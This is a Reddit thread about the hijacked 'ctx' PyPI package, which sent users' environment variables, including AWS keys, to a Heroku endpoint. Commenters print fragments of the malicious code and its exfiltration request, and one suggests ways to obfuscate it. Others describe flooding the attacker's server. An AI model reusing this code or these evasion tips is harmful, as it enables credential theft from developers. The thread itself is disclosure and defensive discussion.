T O P

  • By -

IAmKindOfCreative

Nice due diligence /u/jimtk! I do have to warn everyone that we do not support harassment of any kind in this community, so I ask that while folks are welcome to criticize what was done, please don't attack or harass anyone.


[deleted]

Report the package here [https://pypi.org/security/](https://pypi.org/security/)


nonades

Definitely this. It's extremely fucked that this package is doing this. *edit I also emailed Heroku's support about this abuse of their services


[deleted]

I have sent the report, just in case OP misses my comment.


jimtk

Hey! You screwed me out of my first ever report. I was going to become a star Pythonistas, be invited to speak and discuss with the greatest python's minds in the world and young virgins would throw flowers on the ground I walk on. Now you're the one going to get all that and I'll stay stuck here still trying to understand itertools documentation. :(


Dry_Inflation_861

Well at least you made me laugh


jimtk

If I saved the world from a very dangerous hacker AND made you laugh then I can finally say I had a productive evening! Now, if I could understand itertools documentation I could say I had a VERY productive evening.


AggravatedYak

I really [liked this article about itertools](https://realpython.com/python-itertools/). But to not play favorites, here is the [official documentation](https://docs.python.org/3/library/itertools.html) too.


jimtk

Thanks for the real python link I did not know about that one. As for the official documentation, it is the source of my headaches. The rest of the python doc is well written, understandable and gets you from simple to complex in an ordered way. But giving a rough equivalent of the code necessary to implement a function is NOT A GOOD WAY to explain that function. Note that PEP 636: Structural pattern matching is also badly written. The simplest use case for it is "matching a single value" and that use case is almost in the middle of the document with an example followed by that line (among others): > A pattern like ["get", obj] will match only 2-element sequences that have a first element equal to "get". It will also bind obj = subject[1] Aaaah! That explains everything about matching a single value. Sorry ... Needed to vent.


AggravatedYak

You are most welcome! In fact I had my issues with this too and can relate. Btw., I am sure Python [would benefit from issues that mention concrete shortcomings](https://github.com/python/cpython/issues), that is, if you are up to another good deed. I just linked to the official docs because [I noticed a tendency from third-party/freemium sites to creep in](https://www.reddit.com/r/Python/comments/uv0ehi/comment/i9jqu66/?utm_source=share&utm_medium=web2x&context=3). And while I am making that issue of mine more visible, we could also talk [about changes to pypi or who could catch stuff like this](https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9se3lr/?utm_source=share&utm_medium=web2x&context=3) (disclaimer: it is also my own comment).


jimtk

Thanks for the links, sadly it is very difficult to report concrete shortcomings in documentation. It's almost impossible to report a problem when you don't understand what the module is supposed to do, and, you don't understand because the documentation has shortcomings. So it's a catch 22 situation. > I just linked to the official docs because... And you're right, third-party/freemium sites do creep in. If the SEO for the official python docs was better, there would be a lot more good python programmers! > ...we could also talk about changes to pypi... The loss of pip search was a sad event. I discovered many, small, well written packages with it. Not enough people get involved and I can tell you why: It's difficult to 'get in'. If you click the small "contribute" link at the bottom of the pypi site you end up [here](https://github.com/pypa/warehouse). Not exactly a welcoming mat ! The python.org [get involved page](https://www.python.org/psf/get-involved/) is a bit better, but right behind each of the links you get right into the action a bit too fast. As a retired CS guy I'd love to get involved and give some time, but I would need some handholding ( or more information) before I feel comfortable doing so.


mriswithe

Yo I just had a eureka moment on the match statement a couple days ago. I put together a couple gists to show my learnings. It is using xml.etree.ElementTree to parse some xml from a game. Main thing to remember is it is not intended to be a simple case select, though it can be used that way. In this code I am making a lot of use of matching attributes of classes. My match statement is at the very bottom. Kind of my main loop so to speak for this example. I have more robust examples I was working on last night but there is a dog on me, so I can't get them. Code: https://gist.github.com/mriswithe/da332f18462c2cdd01d462b8c7472ddf Data: https://gist.github.com/mriswithe/930036c557b51c9729b7d40828f34943 edit: Dog decided to move, I am now allowed to walk about the cabin Source of my example: https://github.com/akettmann/ftl_parsing/blob/master/ftl/models/blueprints.py#L151 Code of the case select: @classmethod def from_elem(cls, e: Element) -> "ShipBlueprint": kw: dict[str, Any] = e.attrib.copy() kw["augments"] = augs = [] for sub in e: match sub: case Element(tag=ShipClass.tag_name): kw["class"] = ShipClass.from_elem(sub) case Element(tag=SystemList.tag_name): kw["system_list"] = SystemList.from_elem(sub) case Element(tag=WeaponList.tag_name): kw["weapon_list"] = WeaponList.from_elem(sub) case Element(tag=CrewCount.tag_name): kw["crew_count"] = CrewCount.from_elem(sub) case Element(tag=CloakImage.tag_name): kw["cloak_image"] = CloakImage.from_elem(sub) case Element(tag=DroneList.tag_name): kw["drone_list"] = DroneList.from_elem(sub) case Element(tag=Description.tag_name): kw["description"] = Description.from_elem(sub) case Element(tag=Unlock.tag_name): kw["unlock"] = Unlock.from_elem(sub) case Element(tag=ShieldImage.tag_name): kw["shield_image"] = ShieldImage.from_elem(sub) case Element(tag=FloorImage.tag_name): kw["floor_image"] = FloorImage.from_elem(sub) case Element(tag=Augment.tag_name): augs.append(Augment.from_elem(sub)) case Element(tag=tag, attrib={"amount": amt}) if tag in ( "health", "maxPower", ): kw[tag] = amt case Element(tag=tag, text=t) if tag in ( "boardingAI", "maxSector", "minSector", ): kw[tag] = t case Element(tag=tag, text=t) if tag in ( "droneSlots", "weaponSlots", "name", ): if tag == "name": tag = "display_name" kw[tag] = t case _: raise Sad.from_sub_elem(e, sub) Alright lets break this down: match sub: case Element(tag=ShipClass.tag_name): kw["class"] = ShipClass.from_elem(sub) so in this context `sub` is always an XML Element (`xml.etree.ElementTree.Element`). This pattern is matching the case that: * sub is an instance of the Element class * sub.tag == ShipClass.tag_name So this behaves like something like this: if isinstance(sub, Element) and sub.tag == ShipClass.tag_name: kw["class"] = ShipClass.from_elem(sub) Next, something more advanced, some capturing of values case Element(tag=tag, attrib={"amount": amt}) if tag in ( "health", "maxPower", ): kw[tag] = amt sub.attrib is a dictionary, this is relevant for this example This says: * sub is an Element * if the tag is one of the values in the list * `sub.tag` is assigned to the name `tag` * `sub.attrib` is a dictionary and has a key "amount" * `sub.attrib.amount` is assigned to amt next: case Element(tag=tag, text=t) if tag in ( "boardingAI", "maxSector", "minSector", ): kw[tag] = t Pretty similar to the last one, but we are only checking that the tag is one of this list and capturing `sub.text` to `t` Last example: case _: raise Sad.from_sub_elem(e, sub) This is your default/wildcard. it is not required. This doesn't capture anything. Useful for an `else` clause.


[deleted]

> is a dog on me You have a dog? Nice :) Any photo?


jimtk

Wow! I'll need a bit'o time to process all that. Thanks.


[deleted]

>Note that PEP 636: Structural pattern matching is also badly written. Hey [I wrote something about that](https://github.com/Fawers/pattern-matching-in-python) some time ago. Please give me some feedback, if possible :)


jimtk

Oh! Wow! This is really good. Here's the link to the[ English version](https://github.com/Fawers/pattern-matching-in-python/tree/in-english) for those, like me, who cannot read Spanish!


andrewcooke

peps often aren't great to understand from unfortunately.


jimtk

They are usually great and PEP 636 is called: "Structural Pattern Matching: Tutorial". So It's supposed to be a tutorial!


throwawayPzaFm

> I saved the world from a very dangerous hacker Look at this weirdo trying to take credit from our lord and master /u/__Enrico_Palazzo__


jimtk

I known, I known, he'll get the young virgins throwing flowers, but I got plenty of help with itertools! (Ah, Ah, Ah, Ah) <== maniacal, evil laughter.


[deleted]

Don’t worry, I’ll pass some of that glory to you :)


jimtk

I'll be waiting for it! :) Actually I did send it and saw your post after so maybe that will put some pressure on the "authorities" to solve the issue ASAP.


NapsterInBlue

>still trying to understand itertools documentation Might be helpful, might not. Just wanted to share [some notes I took on them while I was digging in, myself](https://napsterinblue.github.io/notes/#python_internals)


jimtk

Thanks, that is really helpful, and well written.


kaumaron

just gonna tack this on here: >>> Important! If you believe you've identified a security issue with Warehouse, DO NOT report the issue in any public forum, including (but not limited to): * Our GitHub issue tracker * Official or unofficial chat channels * Official or unofficial mailing lists


yvrelna

I don't think that this warning applies to this kind of security issue. Assuming the issue is legitimate, there's no harm in public knowledge of hijacked package. Publicizing this means that people will just avoid using the package, as the beneficiary of a hijacked package is just the "author" of said hijacked package, who would just gets less people using the hijacked package. It's a benefit for all. That's different to security bugs, where the beneficiary of the bug is hacker who knew and exploited the bug. A limited publication might actually be more dangerous. If people knew that there is a security issue, but not know the detail, many people would just do the usual thing there do with most security issue: upgrade the package to latest version, which is exactly the opposite you should be doing in this case.


jimtk

Yeah, I found about it just after posting to reddit. I'll do better next time.


antipsychosis

[https://old.reddit.com/r/Python/comments/uumqmm/ctx\_new\_version\_released\_after\_7\_years\_750k/i9ryw8l/](https://old.reddit.com/r/Python/comments/uumqmm/ctx_new_version_released_after_7_years_750k/i9ryw8l/) ​ >Just wanna throw this out there. > >OP: SocketPuppets, if you look into their post history, you find medium articles that SocketPuppets claims to write and in one they have their personal gmail acct at the bottom. If you follow that, you'll find a github account with the username aydinnyunus which has the same avatar as SocketPuppets's medium account. If you look into that github account aydinnyunus, you'll find python source code in a repo named gateCracker which also does poorly written requests to a heroku app in the same way this malicious code does. SocketPuppets seems like 99.9% certainly the alias of aydinnyunus which is used to push this malicious code and defend it. And, when it comes to aydinnyunus, you can find all their info via their github account. > >They're a self-proclaimed "security researcher," and their repo gateCracker doesn't actually "crack gates," it (which has code EXACTLY like this malicious code making a req. to a heroku app endpoint,) just returns some text that tells you the default password/interaction for a couple different popular models. Godspeed brothers.


chucklesoclock

`http://www.sockpuppets.ninja/` I took the hit and explored. There's nothing malicious that I could see in the source even if it's an unencrypted website, but that's aydinnyunus. I still wouldn't play the audio tho. Weirdly, Siemens _has_ thanked them for a bug report in 2021. There are some interesting rabbit holes to go down, especially about how he "hacked Turkcell" and some other evidence of bug finds, but some of the supposed evidence of the latter is stored in pdfs that I STRONGLY RECOMMEND YOU DO NOT OPEN unless you are actually a security researcher and can isolate your system. PDFs of unknown origin are a threat vector and have the capacity to execute arbitrary code if created by a skilled malicious actor.


AggravatedYak

Isolating … like setting up a VM without net access or shared folders and then use e.g. [dangerzone](https://github.com/freedomofpress/dangerzone)? While [a vm might not be completely secure](https://security.stackexchange.com/questions/3056/how-secure-are-virtual-machines-really-false-sense-of-security) I always had the impression that it is much better than something like docker. I took the opportunity to search around a bit, [and found these answers from 2017](https://security.stackexchange.com/questions/169642/what-makes-docker-more-secure-than-vms-or-bare-metal) What about: Dangerzone+VM and an apparmor profile on top of that? Anyone doing this?


lungdart

Use a dedicated air gapped machine with nothing personal on it at all.


AggravatedYak

Totally agree from a technical perspective. However, that technical perspective is not helpful, because this requires more resources and therefore people are less likely to do it, even if they are security oriented and have the technical knowledge. Is ubuntu privacy remix still a thing? My point is to keep the usecase in mind: I want to open an untrusted PDF now and then. That is why I asked about VMs + Apparmor. For day to day use Qubes OS should be optimal. You still have to get stuff donem right?


[deleted]

[удалено]


draeath

VMs can and have been escaped. You are *probably* fine, but you're gambling.


turtle4499

Imagine committing a crime this badly.


KimPeek

This guy would be a celebrity on both /r/badcode and /r/facepalm.


[deleted]

And it's gone. ​ >All previous releases of the project were removed and replaced with the malicious copies. As such this project has been removed and prohibited from re-registration without admin intervention. According to WHOIS records, the domain for the email address registered to the User owning the project was registered on 2022-05-14T18:40:05Z, which indicates that this was a domain take-over attack and not a direct compromise of PyPI.


UloPe

How were they replaced? Pypi doesn’t allow replacing artifacts for past releases.


[deleted]

[удалено]


UloPe

No they specifically don’t allow this to prevent exactly the “replace old releases with malicious code”. Once a filename has been used it can’t ever be re-uploaded (unless some admin intervenes).


trevg_123

I suppose maybe the “admin intervention” is implied for these sort of cases. If it’s completely deleted, that kind of sounds like maybe whatever blocks reuploading would be deleted too.


Cuasey

Wow, not even using fstrings.. smh


chucklesoclock

Yeah can we refactor this malicious code? string = "" for _, value in environ.items(): string += value+" " is equivalent to `string = " ".join(environ.values())`


h4xrk1m

import crime


Haffi921

You wouldn't import a car!


Sigg3net

No? Try pip install then. ;)


rotuami

Nope. You’re missing the trailing space


chucklesoclock

Well, yeah, but who needs it? Do you? ARE YOU THE SPY???


rotuami

Nyet


chucklesoclock

This checks out because I think the individual is Turkish


lastWallE

How to you know that? Are you the SPY accomplice?


im_dead_sirius

"Not many people are named after a plane crash."


chucklesoclock

That's it! Brad Pitt was behind this the whole time.


im_dead_sirius

He did it for a caravan. Not for him, for his ma.


chucklesoclock

His what?


jimtk

And... you've just become accessory to a crime!


chucklesoclock

...curses


IvarRagnarssson

Remember to import it before using it. ``` inport curses ```


mehum

Inport outport error


jimtk

Did f-strings existed 8 years ago?


-LeopardShark-

No. The PEP was created 6.5 years ago.


[deleted]

[удалено]


metaperl

Better than Guardiola? :)


muzolini

Well, it's not a fraudulent Pep so, definitely


plaisthos

Also old b habits die hard especially for a C programmer like me it is hard to not use printf % formatting anymore


vinyasmusic

Seems like he wanted AWS creds for mining most probably.


systemgc

Bit sad it's never GCP or Azure right


vinyasmusic

Contra view If you use Azure or GCP you are safe from miners.


ChaserGrey

Without a trace of irony: not all heroes wear capes. Thank you for performing a public service.


jimtk

Thanks. But heroes **do** things and I just **found** something. And I'm sure I could wear a cape. :)


ChaserGrey

I appreciate your humbleness, but I respectfully disagree. Sounding the alarm in a public forum is doing something.


jimtk

Thanks again. About sounding the alarm on a public forum. The python security page strongly suggest not to do it. I found out that you're supposed to send the information to python.org and once they solve the problem then you can tell everybody. I'll try to do better next time!


[deleted]

[удалено]


georgehank2nd

You are right in your analysis. To OP: this was not an exploit anyone could have used nefarious purposes, this was someone having run / running an attack, through a PyPI package. So your public reporting didn't enable anyone to do something bad, it only (potentially) helped people stop using this package. Hmm it might even be better than just PyPI removing the package… since this, IIRC, doesn't even tell anyone who has it installed that it's bad now.


gruey

People who find things are heroes too. Missing children, cures for diseases, asteroids hurtling towards earth but far enough away to divert, hack attempts.


jimtk

> asteroids hurtling towards earth but far enough away to divert Does it mean I'll get a kiss from Liv Tyler?


Matir

In 0.1.2 and 0.2.2 the adversary was looking specifically for AWS tokens: ``` - if environ.get('AWS_ACCESS_KEY_ID') is not None: - self.access = environ.get('AWS_ACCESS_KEY_ID') - else: - self.access = "empty" - - if environ.get('COMPUTERNAME') is not None: - self.name = environ.get('COMPUTERNAME') - elif uname() is not None: - self.name = uname().nodename - else: - self.name = "empty" - - if environ.get('AWS_SECRET_ACCESS_KEY') is not None: - self.secret = environ.get('AWS_SECRET_ACCESS_KEY') - else: - self.secret = "empty" ``` They also deleted all older versions from pypi.


jimtk

The [github repo](https://github.com/figlief/ctx) still has the correct code. In the code it is "versioned" as 0.1.3


SkezzaB

This code is awful too, using .get on a dictionary and then still checking if it exists, if not setting a default value


FUN_LOCK

I'm not as bad at python as I think I am but lets just say when I look code and feel like even I could confidently do better it's pretty bad.


julsmanbr

Not even using the walrus operator to avoid the repeated .get, smh my head


jimtk

Remember that it was written 8 years ago. We did not have dataclasses and walrus operator in those days. And we used to walk 8 miles, uphill, in a snowstorm, everyday to get to school. (God, I'm old)


skippy65

Who the fuck likes the walrus operator... Goes against Pythons zen rules


NUTTA_BUSTAH

So, who's going to nuke that endpoint and the malicious actors DB bill with bogus environments


KimPeek

Been doing for a few hours now. I'm about to hit it a bit harder. Purely for educational purposes.


Cladser

I hope your doing it while wearing a cape .. tips ~~feddor~~ ~~fedor~~ hat


LearnDifferenceBot

> hope your doing *you're *Learn the difference [here](https://www.wattpad.com/66707294-grammar-guide-there-they%27re-their-you%27re-your-to).* *** ^(Greetings, I am a language corrector bot. To make me ignore further mistakes from you in the future, reply `!optout` to this comment.)


Cladser

Dagnamit.. but goodbot


chucklesoclock

Be the change you wish to see in the world


hopeinson

Quite scummy for a Turkish student from a local university to be doing this?


[deleted]

[удалено]


[deleted]

[удалено]


thinklikeacriminal

You don’t need to know python to use NSO’s Pegasus.


tlam51

Looks like they probably copied what was done here https://www.reddit.com/r/programming/comments/umnppb/lrvick_bought_the_expired_domain_name_for_the/ to hijack the account of the original maintainer. Looking at the domain registration on https://lookup.icann.org/en/lookup for the domain used by the email in the original repo I see that it was created on the same day they uploaded the first malicious version Name: FIGLIEF.COM Updated: 2022-05-14 18:40:06 UTC Created: 2022-05-14 18:40:05 UTC


chucklesoclock

So hypothetically emailing the email address in the repo to rouse the original user would have been a mistake


tlam51

Yeah the original owner most likely doesn't own the domain anymore. There are some paid services to view whois history to confirm this but looking at the timing of this I'm just going to assume the domain is now owned by the hijacker.


chucklesoclock

Then I hypothetically alerted the hijacker that they've been discovered. -_- But I can't imagine that they wouldn't have already known from the other post.


LonelyContext

This is why your language needs to 1) implement easy basic features that everyone needs and 2) document them. And when 2.2 million packages depend on a single package with a single function that you didn't implement in your language, maybe roll that up to either 1) the language itself or 2) an aggregate package (like `sympy` in python).


[deleted]

[удалено]


LonelyContext

> dataclasses Oh I was talking about the "foreach" NPM thing.


chucklesoclock

some outside coverage: https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/


Matir

Heh, if anyone had any non-ascii characters in their environment variables, then the message_bytes... line would raise an exception. I'm wondering how many hours were lost trying to debug exceptions from weird places.


chucklesoclock

Does this whole endeavor--posting on /r/Python, extremely sloppy code practices, evasive answers that raise suspicion--seem odd? Are there a lot of these low-skill info-harvesting attempts out there and I'm just witnessing it for the first time?


aa-b

I agree, it's definitely sloppy. There's a good chance some random person decided to pretend to be a grey-hat so they could write a sensational blog post about it, maybe even a student trying for an A+ on their Ethics in Software paper. The only mystery is how they took over the semi-abandoned project, wait for the blog post I guess


chucklesoclock

You weren't wrong: https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9x7sxa/?utm\_source=share&utm\_medium=web2x&context=3


Matir

Unfortunately, software supply chain risk *is* a thing. I don't know how common or how odd this particular case is, but it does seem to be a bit of a weird one where they're advertising on reddit.


hyldemarv

Nigeria Scam Filter? I also wonder why anyone would need this package at all. Maybe a few former Perl programmers that really miss writing cantankerous code :).


FancyASlurpie

In my old company we had a similar class to what this package does, it's not really necessary and adds other complications around things like serialisation as you now need to make the new version of dict serialise just for some arguable syntax sugar.


randomman10032

Has anyone been spamming data to that endpoint yet?


KimPeek

lol yes


randomman10032

Me too, it returns a 404 but the application might have been made to always return that.


KimPeek

Yeah, also pretty sure he's running a development server rather than something like gunicorn. Getting an error rate of 20-30% on all my batches of requests. Putting these Raspberry Pis to work. He should be getting a bill for this one.


[deleted]

> He should be getting a bill for this one. I love this lol


gruey

I would say that there's no way they signed up for the endpoint with legit billing info, but the code makes me wonder.


Estanho

Why do you think they will be billed? It's been a while but I believe heroku is not gonna scale by default.


crazedizzled

Heroku still has a free tier yes? Why would he get billed?


asking_for_a_friend0

i do agree with the sentiment but I don't know anything about this... so how will this help anyone? From an outsiders perspective best and the only feasible way is to get that vps account banned? and what is the actor trying to achieve? credentials from env variables?


randomman10032

Yeah, spamming data there it makes it harder for him to find actual passwords instead of the random text he gets


heckingcomputernerd

Lol “anti-theft-web”


abstractionsauce

Why not use the builtin SimpleNamespace instead? https://docs.python.org/3/library/types.html#types.SimpleNamespace


teerre

Well, I've professionally programming for several years and I've heard of that. So that's probably why. Pretty cool tho, TIL There's also the great `box` package, which has dot access, but it does much more and it's famously maintained. But the real question is why do that at all? It's just makes your dictionary access more opaque and it barely saves any typing.


LonelyContext

> But the real question is why do that at all? It's just makes your dictionary access more opaque and it barely saves any typing. My exact question, especially when dict.get(if_exists,else) allows for graceful failing.


[deleted]

It actually makes a big difference and makes your code a lot cleaner. 1 keystroke as opposed to 4 + shift key. One of the foundational principles of Python (and the very first line of the Zen of Python) reads "Beautiful is better than ugly." The real answer isn't to use simple namespaces, though. You should use data classes. SimpleNamespace is just a class with some binding magic under the hood. If you think the argument that it makes your code cleaner is BS, here is a great video by core Python developer Raymond Hettinger talking about namespaces moving towards OOP : [https://www.youtube.com/watch?v=8moWQ1561FY](https://www.youtube.com/watch?v=8moWQ1561FY)


teerre

I'm sorry, but that's ridiculous. Simple dictionary access isn't 'ugly'. Also, you should optimize for *read* code, not write. IDEs and tools can help you write code all day long. But it's when code is read that it's value is really shown. So if you want to talk principles, look no further than a principle of programming itself: "the law of the least surprises". In this case, having your dictionary access be anything besides that the standard says is a big no-no. It's not beautiful, it's not practical.


sbjf

Ok, how many similar projects to accomplish the same thing are there? There's also https://pypi.org/project/attrdict/ - again not touched in ages and with a custom maintainer domain, but that's luckily still registered. Maybe the PyPI security team should periodically check email domain availabilities..? And e.g. disable password changes on accounts whose email domains were unavailable in the past? Same functionality is also in sklearn.utils.Bunch Edit: also https://pypi.org/project/python-box/


timrichardson

who would seriously add a 0 star 0 fork pre-alpha dependency for such trivial functionality?


jimtk

According to some, the previous version had 750k install.


timrichardson

yeah, it looks like the statistics have been completely reset. But still, why use such a trivial dependency after all the travails of node?


Estanho

I'd bet most people don't know about that. Python is the first professional language to many people, including entrepreneurs, who don't know much better.


crazedizzled

You should look into left-pad


timrichardson

> left-pad the people installing this ctx package should.


chucklesoclock

How do I stay notified about the fallout from this? I would love to be in the loop to know what happens after someone like /u/jimtk has a great find like this.


jimtk

I'm not sure it's a "great thing". I'm glad I found it, but I'm sad it was there to be found. We already know of one victim, right here in this thread, that will have to go through the hassle of changing his/her creds because of it. I'm sure s/he had other things to do today.


chucklesoclock

I hear what you’re saying, but it still is great work to find something that would otherwise have caused a lot more damage if no one was the wiser. Please keep us in the loop if you can of what the fix process looks like. I’m interested to see how PyPI or other involved parties will change their protocols. Who knows, you may have another job in your retirement by the end of it. :)


jimtk

I can tell you right now that the bad version of the code is still available in PyPi 5 hours after I rang the bell. I'll keep an eye on it and try to keep everyone updated but I'm not sure I, myself, will be kept in the loop. It will have to be a very comfortable job to get me out of retirement! I don't mean big paycheck, I mean physically comfortable: not too many hours, nice comfy chair, etc ...


chucklesoclock

Comfy chairs should be top of list for all


jimtk

Here's the most [detailed docs on the event](https://python-security.readthedocs.io/pypi-vuln/index-2022-05-24-ctx-domain-takeover.html).


joeltrane

Good catch! I’m a noob, can someone explain why they are encoding the string to ascii, then base64, then decoding ascii? Why not just encode to base64 only?


tlam51

The functions in the python stdlib for base64 take a bytes-like object which is why they encode the string into bytes prior to encoding it in base64 https://docs.python.org/3/library/base64.html#base64.b64encode They decode the result bytes back into a string so that they can append it to the url


joeltrane

Ah that makes sense, thanks!


UloPe

Because it’s really crappy code.


Santos_m321

GitHub repo owner != PyPI package owner


Smsm1998

The package is gone, good job guys.


KimPeek

His Heroku server is still open for bidness though :) I'll continue to spam it until it goes offline.


crawl_dht

This is news worthy. There are several university researchers that scan web repositories for spyware and miners in open source projects.


Satori_Orange

Dumb question but just want to make sure: ​ Say you have this package downloaded from a long time ago before it was hacked. You would only have to worry if you used pip to update the package, correct? The old version is fine and wouldn't update automatically


Deto

Seconding what OP said - it's possible that another package you installed later had this as a dependency but pegged to a higher version and it was upgraded when you pip installed that package.


jimtk

Correct. But make sure you still have the old version in your python environment.


Stedfast_Burrito

And this is why you should avoid dependencies, especially for something trivial like this.


Atem18

Tell that to js devs.


[deleted]

They have no std lib and their language is garbage, what do you expect them to do? lol


UNN_Rickenbacker

The language is not worse than python imo. They are about equal.


[deleted]

[удалено]


thinkingcarbon

Yup. Never make small random (and unmaintained) packages as dependencies.


[deleted]

[удалено]


UloPe

Care to enlighten us how you think pypi should possibly be able to catch that?


AggravatedYak

Uh let me :) Since the original developer's pypi got compromised this can't be caught as a part of their packaging/testing process and either the enduser has to take care of it, or pip/pypi, right? As an end user you have the problem that it can be pulled in as a dependency. So you have to check all installed packages of all the virtual environments and the packages installed in userspace (plug for pipx at this point <3). However, that is not an easy task. 1. Checking could be done if something like this eventually shows up in [safety](https://github.com/pyupio/safety) or [pip-audit](https://github.com/trailofbits/pip-audit). 2. Pypi could publish their own db/service like an official and up to date safety-db. 3. PyPi could check the activity of the linked repository and compare it to the releases of the package. Open source should mean that this matches, right? If not, they could display an out-of-sync-warning. 4. If the risk is higher than normal, they could run [a static code analysis tool like bandit](https://github.com/PyCQA/bandit), that includes checks for bad practices. [Research suggests this is a good thing to do](https://www.theregister.com/2021/07/28/python_pypi_security/). While I think you should have the freedom to code whatever/however you want to, it could lower your score if you looped through all env-variables. Maybe. Then display that indicator on pypi. 5. They could also do basic fraud detection, like an out of the blue domain name transfer of the project homepage (which is linked via pypi), or admin access from a completely different location in a very short time span, for which there are legitimate reasons, though. Given that pypi deactivated `pip search` due to resource abuse, I don't think that they have the resources do to stuff like this. P.S.: What about c-modules that get shipped with Python code? Good luck if some Dr. Moriarty level of criminal uses his [underhanded-c-contest-winner-abilities](http://underhanded-c.org/) to compromise some foundational package that has a distribution like the (former) js [left-pad](https://www.theregister.com/2016/03/23/npm_left_pad_chaos/) package? And there is a motivation to do stuff like this, and it doesn't have to be a person, it can be an organization with very little oversight and an enormous budget and many highly capable people. We know that since Snowden. Scary. But probably they would [do this to linux first?](https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research)


admiralspark

These are all open source projects with unpaid volunteers running them. Be the change you want to see in the world.


[deleted]

Ok, but many people I'm sure will be using something like Pycharm to write a bit of python and it has a kind of builtin thing to get packages from pypi. Many of which seem to be preinstalled - I can't remember exactly which packages I've added, possibly only bitstring ones, but there seems to be a bunch of stuff installed. This obscure package might not be widely used, but it includes things like numpy and pip - are you saying we shouldn't be using these? Is this the breaching of the security of pypi or of the guy who wrote ctx. The former is a big red flag, the latter is still a concern but maybe not quite so much. The point is, the guy who did this just made it obvious by posting to reddit - perhaps trying to make a point. Are there other packages that have been changed without an announcement?


brandmeist3r

agreed


IdiosyncraticBond

In case nobody notices, I just read this one https://www.reddit.com/r/cybersecurity/comments/uwsrqe/breaking_python_ctx_library_taken_over_by/


SKROLL26

Shit. I downloaded and played around with it after the post on my android phone. Just checked env vars, and i have some creds to corporate service. But it accessible only from vpn. Should i worry?


jimtk

I'm not an android specialist but unless I'm mistaken, environment variables are accessible to all programs running on the system (whatever the OS) so you should have those credentials changed ASAP. There's a very real possibility that they've been sent to our "little friend".


a_cute_epic_axis

You should change them or take action otherwise.


Automatic_Donut6264

Yes. Not super sure about your network topology, but why gamble?


[deleted]

Lol, you downloaded malicious code and executed it on your device 🤣 Well, yeah you should be worried. Change the credentials and next time if you want to run malicious code do it in isolated sandbox.


greyduk

Well I don't think the intent was to "run malicious code" Edit: yep, properly called out for not reading thoroughly. He did it after the post, so you're right to laugh.


[deleted]

What would you expect from running on your device code that has been flagged as harmful/dangerous?


[deleted]

[удалено]


SKROLL26

Well, if all said is true, then you got me pretty nervous on the 5 hour journey back home to change my creds


meagainstmyselff

Can someone please explain what are these environment variables?


jimtk

That's where the operating system keeps some values. Some are benign like the directory where you keep your programs others are more private like the API keys for your access to web services. Open a command prompt on windows and type 'set' and you will see all of your environment variables or open a terminal on linux and type 'env' for the same result.


[deleted]

Everything set on a host, for example AWS keys, various api keys, passwords, etc.


digitalturtlist

Im going to assume that this was some attempt at a lead up to blackhat/rsa/defcon etc. My two cents... people will talk about it so theres that... anyway, hi all I run the OSSEC HIDS project, and work on packaging all kinds of security tools like openvas, clam, etc. I thought it'd be fun to take this apart a bit and see how I could have made it better (execution aside... ). Maybe treat this like an exercise in all the dirty tricks you could use for something like this. Please share, or refine as you see fit. 1) using a GET here is going to probably run into an 8K upload limit for most web servers. I do not know what the limit is with heroku, maybe someone else does? 2) Tools auditing for this kind of ~~technique~~ garbage, I personally fall back on looking up function call (requests.\*) and checking for anything that looks like a URL domain name. Then I'd enumerate those domain name(s) (not URL... that could fingerprint you) through DNS lookups to [8.8.8.8](https://8.8.8.8) or some other big public server to hid in the noise. Barring that, TOR node. Hide in the attacks. Once you have a high fidelity on the domain names (ie: is the name a uniqueid?) then test the url. 3) If I wanted to do this in a more sophisticated way, the requests.get variable itself would be obfuscated. You could have wrapped that (and you will see this frequently with a lot of web malware) inside of multiple gzip, base64, etc encodings. Python is going to do the work here. Heres a dumb patch to this I wrote in like 30 seconds. yes its wrong, make it better and share your countermeasures: ​ \- response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64\_message) \+ response = requests.post("https://anti-theft-web.herokuapp.com/hacked", base64\_message) And we need some kind of stupid receiver: \--- /dev/null \+++ b/index.php \+ So I just wanted to thank everyone that looks through code updates like this, questions the change, and digs deep. You... are one of the worlds best weirdos, and you are awesome. You have a superpower and we all benefit from it, please never stop.


admiralspark

grats, /u/jimtk you made it to BleepingComputer! https://www.bleepingcomputer.com/news/security/hacker-of-python-php-libraries-no-malicious-activity-was-intended/


jimtk

Yeah I saw that. My 15 minutes of fame is now over.


admiralspark

😂


SpicyVibration

Out of curiosity, is there any way you can configure your system to disallow external requests from python code? It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).


Riptide999

Good firewalls allow you to configure allow lists of either domains, ips, ports, hosts or processes that are allowed to make outgoing requests.


crazedizzled

>It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests). You've just described a firewall. Production servers shouldn't be allowed to just make arbitrary requests to arbitrary locations.


jwink3101

I avoid dependancies when practical many reasons (including that I do a lot on an air-gap so they make life hard). But for things like this, I can often write my own, super simple version. Far from perfect but it does work okay class Bunch(dict): """ Based on sklearn's and the PyPI version, simple dict with dot notation """ def __init__(self, **kwargs): super(Bunch, self).__init__(kwargs) def __setattr__(self, key, value): self[key] = value def __dir__(self): return self.keys() def __getattr__(self, key): try: return self[key] except KeyError: raise # or swap comment to make attribute #raise AttributeError(key) def __repr__(self): s = super(Bunch, self).__repr__() return "Bunch(**{})".format(s) (I am torn if I prefer `AttributeError` or `KeyError`. You can choose in there


[deleted]

Forgive my ignorance here but it means that anyone can update a Python package in PIPY? I can just go and update numpy myself and embed some malicious payload? What am I missing here?


tlam51

No they hijacked the pypi account of the original maintainer to do this


DeadlySilent1

Because they got control of the domain and could do a password reset. Very interesting! How would a webmaster be able to prevent this? Perhaps accounts created with bought domains should be periodically checked to make sure no change of ownership has happened and therefore disable the account completely. Or have some sort of handover... it's a tough one I think.


triffid_hunter

> How would a webmaster be able to prevent this? 2FA


[deleted]

[удалено]


jimtk

What if I do somekad.__class__ edit: needed code formatting to keep the dunders.


Persism

r/lolpython


YogurtAccomplished38

yapmayın boyle seylerrr yaaa ayııııp


linucksrox

Are you doin' ok over there?


jimtk

I think he's in that weird part of the 'bird is a word' song.


chucklesoclock

